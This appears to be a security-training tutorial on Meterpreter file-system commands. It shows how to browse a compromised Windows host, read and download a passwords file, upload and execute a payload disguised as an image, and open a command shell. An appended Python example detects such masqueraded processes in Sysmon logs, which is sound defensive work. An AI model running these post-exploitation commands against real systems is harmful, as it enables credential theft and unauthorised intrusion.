White Hat Institute

Meterpreter file system commands (post-exploitation techniques part-2)

When you have a Meterpreter shell, you are dealing with two file systems: the local one on your machine and the remote one on the target. File system commands enable you to interact with both, and they mirror the standard Linux commands for navigating and using a file system.

To print the current working directory, use the “pwd” command.

Ex: (meterpreter > pwd).

To list all files and directories in the current directory, use the “ls” command.

Ex: (meterpreter > ls).

To change the current directory, use the command “cd” and provide the directory name.

Ex: (meterpreter > cd IEUser).

To read a file, use the “cat” command and specify the name of the file you want to read.

Ex: (meterpreter > cat Passwords.txt).

To download a particular file, use the “download” command and specify the file you want to download.

Ex: (meterpreter > download Passwords.txt).

The “Passwords.txt” file will be downloaded to the current working directory on your local machine.

To upload a file, use the “upload” command and specify a file or a direct path to the file you want to upload.

Ex: (meterpreter > upload /var/www/html/Evil-Files/Nissan.jpg).

To execute a file, use the “execute -f” command and specify a file name.

Ex: (meterpreter > execute -f Nissan.jpg).

To change the Meterpreter shell to a Windows command shell, use the “shell” command.

Ex: (meterpreter > shell).

Now you can use the default Windows command prompt to perform further investigations or attacks.
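
On the defender's side, the “execute” and “shell” steps above leave process-creation records on the target. The following is an added example, not part of the original article: it triages Sysmon Event ID 1 (process creation) records for a process image, or a parent image, that lacks an executable extension, as with Nissan.jpg. The sample events, process IDs, the “update.exe” parent and the extension allow-list are constructed assumptions.

```python
import ntpath

# Assumption: extensions treated as normal for a running image; tune per site.
RUNNABLE_EXTS = {".exe", ".com", ".scr"}
SHELLS = {"cmd.exe", "powershell.exe"}

def image_ext(path):
    """Lower-cased extension of a Windows path ('' if there is none)."""
    return ntpath.splitext(path or "")[1].lower()

def triage(event):
    """Return findings for one Sysmon Event ID 1 record (a dict of fields)."""
    findings = []
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    # A process whose image is named like a picture or document is masquerading.
    if image and image_ext(image) not in RUNNABLE_EXTS:
        findings.append("process image has non-executable extension: " + image)
    # Anything launched by such a process is suspect; a shell is higher priority.
    if parent and image_ext(parent) not in RUNNABLE_EXTS:
        child = ntpath.basename(image).lower()
        kind = "command shell" if child in SHELLS else "child process"
        findings.append(kind + " spawned by masqueraded parent: " + parent)
    return findings

def scan(events):
    """Map ProcessId -> findings for every process-creation event that hits."""
    hits = {}
    for event in events:
        if event.get("EventID") != 1:  # only process creation is examined
            continue
        findings = triage(event)
        if findings:
            hits[event["ProcessId"]] = findings
    return hits

# Constructed sample records (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 1000, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 4321, "Image": r"C:\Users\IEUser\Nissan.jpg",
     "ParentImage": r"C:\Users\IEUser\Downloads\update.exe"},
    {"EventID": 1, "ProcessId": 4400, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\IEUser\Nissan.jpg"},
    {"EventID": 3, "ProcessId": 4321, "Image": r"C:\Users\IEUser\Nissan.jpg"},
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        print(pid, findings)
```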
